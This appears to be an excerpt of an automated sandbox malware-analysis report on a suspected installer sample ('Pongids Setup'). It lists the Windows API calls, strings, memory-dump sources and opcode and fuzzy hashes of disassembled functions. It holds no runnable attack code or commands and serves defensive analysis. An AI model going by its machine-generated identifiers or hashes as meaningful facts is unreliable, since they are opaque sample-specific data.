                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                            • Instruction Fuzzy Hash: D7214FB1904704ABCB319F78DD48B5BBBF8AF41714F048A29EB96B22E0D734E944CB55
                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                              • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 3730416702-0
                                                                            • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                            • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                            • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                            • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                            APIs
                                                                              • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                            • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                            • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                            • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                            • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                                            • lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,765F23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                                            • lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,765F23A0), ref: 00405015
                                                                            • SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2531174081-0
                                                                            • Opcode ID: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                            • Instruction ID: d1dd411a73e10bc413e7a6ba64919406d2bbbb657998d141ba589d50d7388124
                                                                            • Opcode Fuzzy Hash: 8aca45e27811aa21f79b642ec133e9ff2e42e250cada4605035ec104fac27bf5
                                                                            • Instruction Fuzzy Hash: 0D214C71900519AADF119FA5DD849DEBFA9EF09354F14807AF944A6290C7398D40CFA8
                                                                            APIs
                                                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040489F
                                                                            • GetMessagePos.USER32 ref: 004048A7
                                                                            • ScreenToClient.USER32(?,?), ref: 004048C1
                                                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048D3
                                                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004048F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                            • Instruction ID: 53a3bc3e7d347c8b02fcccb5944648bd46d0fd351ff65b71f1969629af7e9ac2
                                                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                            • Instruction Fuzzy Hash: 12019275D00219BAEB00DBA5DC41BFEBBBCAF55711F10412BBA00B71D0C7B469018BA5
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,00030000,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                                            • GlobalFree.KERNEL32(?), ref: 004027F2
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID:
                                                                            • API String ID: 2667972263-0
                                                                            • Opcode ID: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                                            • Instruction ID: ecef423f8b7fb5116dd0415946ee68b484c5f893cd0af9153c7a5222f957d578
                                                                            • Opcode Fuzzy Hash: bd817bc7a5230683892e3683ec6d2df01fe810dda785156d5253b7aae5e8edff
                                                                            • Instruction Fuzzy Hash: B921AE71C00128BBCF216FA5CE49D9E7E79EF09324F14423AF511762D0C6794D419FA9
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404695,000000DF,00000000,00000400,?), ref: 00404818
                                                                            • wsprintfA.USER32 ref: 00404820
                                                                            • SetDlgItemTextA.USER32(?,0079E540), ref: 00404833
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$@y
                                                                            • API String ID: 3540041739-3020698753
                                                                            • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                            • Instruction ID: 9c2068d9445a5b6f252536eabbf1c91049bb0fb02782bdd1491d607ad1f2c465
                                                                            • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                            • Instruction Fuzzy Hash: E711E773A041283BDB0065699C45EAF3698DB86334F254237FA25F31D1EA78CC1182E9
                                                                            APIs
                                                                            • GetDlgItem.USER32(?), ref: 00401D3F
                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                                                            • DeleteObject.GDI32(00000000), ref: 00401D8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                                            • Instruction ID: b8adc288744d91ba617009adb3e02bef21eb0d6e3f954176feac09388768b409
                                                                            • Opcode Fuzzy Hash: 978bdc3de84591c5b34c529a30ac5b154b9d899f544855d7d9a99db957ba7817
                                                                            • Instruction Fuzzy Hash: 45F0FFB2A04119BFE701EBA4DE88DAFB7BCEB44301B104466F601F2191C7749D018B79
                                                                            APIs
                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C74
                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C8C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                                            • Instruction ID: 44e87a32571ed3235eb7b96b36fbe9a42cad9ebb5189372230b031547819aef2
                                                                            • Opcode Fuzzy Hash: 182774ec21bf90fa89628062bdc31045ec8b3e2a1ef169624933301e1dab061d
                                                                            • Instruction Fuzzy Hash: ED21A271E44208BEEB15EFA4DA46AED7FB1EF84314F24403EF101B61D1DA788640DB28
                                                                            APIs
                                                                            • SetWindowTextA.USER32(00000000,Pongids Setup), ref: 00403A7D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: TextWindow
                                                                            • String ID: "C:\Users\user\Desktop\nRNzqQOQwk.exe"$1033$Pongids Setup
                                                                            • API String ID: 530164218-4097393825
                                                                            • Opcode ID: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                                            • Instruction ID: 535a85070ebab7a8ba56d21747a6201fabbada84c5c70f31dda2a066eb9b82e2
                                                                            • Opcode Fuzzy Hash: 6c45f722f9a7ae4fb793d3ca626f1132432b1c01d3db27434527fc1e6ec0313f
                                                                            • Instruction Fuzzy Hash: D1110E35B002019FD7209F15DC80A377B6CEBCA355728823BE841A73A0D73D9D028BA8
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405818
                                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040316D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405821
                                                                            • lstrcatA.KERNEL32(?,00409014), ref: 00405832
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405812
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 2659869361-3355392842
                                                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                            • Instruction ID: 0a665bc2143073433464dc8fd220d9afc6aaff2f2e3703ee86bb110f897cf778
                                                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                            • Instruction Fuzzy Hash: DDD0A9A3606930AAE30222158C09EDF2A58CF12340B048037F200B22A2C63C8E418BFE
                                                                            APIs
                                                                            • CharNextA.USER32(?,?,C:\,?,00405917,C:\,C:\,765F3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,765F3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B9
                                                                            • CharNextA.USER32(00000000), ref: 004058BE
                                                                            • CharNextA.USER32(00000000), ref: 004058D2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext
                                                                            • String ID: C:\
                                                                            • API String ID: 3213498283-3404278061
                                                                            • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                            • Instruction ID: e63bfe958a3d000d539ac339b3831bddf0e80049928d73a3bf58654b49e63fc9
                                                                            • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                            • Instruction Fuzzy Hash: 5CF0F653904F552AFB3272280C40B775B88DB5A361F14C077EE40B62C1D27C4C609FAA
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000,00000000,00402E76,00000001), ref: 00402CA9
                                                                            • GetTickCount.KERNEL32 ref: 00402CC7
                                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402CE4
                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402CF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                            • String ID:
                                                                            • API String ID: 2102729457-0
                                                                            • Opcode ID: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                            • Instruction ID: 9ab3963fa07bdcc1a95f8d1ddaaeb6e773ff80e4731962a5f71ef67b0361f4de
                                                                            • Opcode Fuzzy Hash: e47f6d303f75ebd17c716a95d6a18f35b6dc664df62f34b119683803831f88dc
                                                                            • Instruction Fuzzy Hash: B9F03030809521AFD6125B24FF8EDDE7A64AB41701B114477F414B11E4D7781885CBD9
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00404F5C
                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404FAD
                                                                              • Part of subcall function 00403FD1: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403FE3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                            • Instruction ID: b201a4cd8f35b1f81cb2229438f9677fc33f9f69eb2c65fa3af33e2f38b160ff
                                                                            • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                            • Instruction Fuzzy Hash: C9015EB150424AAFDF209F61DD81A5B3A26E7C4758F104037FB04B52D1D37AAC929A6E
                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 0040555A
                                                                            • CloseHandle.KERNEL32(?), ref: 00405567
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00405544
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                            • Instruction ID: a44fcad5754d04da23f251c2f5d6a8b7866741138784f0b9a4d91a551686e283
                                                                            • Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
                                                                            • Instruction Fuzzy Hash: 93E0BFF4A002097FEB10AB64ED49F7B7BADEB00644F408561FD10F6190E674A9549A79
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,765F3410,00000000,C:\Users\user\AppData\Local\Temp\,00403663,0040347D,?), ref: 004036A5
                                                                            • GlobalFree.KERNEL32(00827080), ref: 004036AC
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040368B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Free$GlobalLibrary
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 1100898210-3355392842
                                                                            • Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                            • Instruction ID: cb5700cda5be72b1964cac96af1ae0fa6ff587f55f39b04be5f0e3e76017d6e4
                                                                            • Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
                                                                            • Instruction Fuzzy Hash: 78E0C2338011206BC7315F04EE04B2A777C6F48B26F020467ED447B3A087792C524BDC
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nRNzqQOQwk.exe,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 0040585F
                                                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nRNzqQOQwk.exe,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 0040586D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3370423016
                                                                            • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                            • Instruction ID: 48f05854ad55b04522f039bc0829861de91cdd92fb90a6685f37373cdb6fd5ef
                                                                            • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                            • Instruction Fuzzy Hash: 05D0C773409DB05EF30362259C04B9F6A98DF17700F094466E580E6191C6789D518BAE
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                            • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                            • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                            • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                            • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                            • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059A0
                                                                            • CharNextA.USER32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059B1
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                            • Instruction ID: 2b31bcc4a158946671b74a97661090b9e56dbbcbef6738157e9c676b7350d0db
                                                                            • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                            • Instruction Fuzzy Hash: 7DF0C272515518FFCB029FA5DC00D9EBBA8EF16360B2540AAF800F7310D274EE019BA9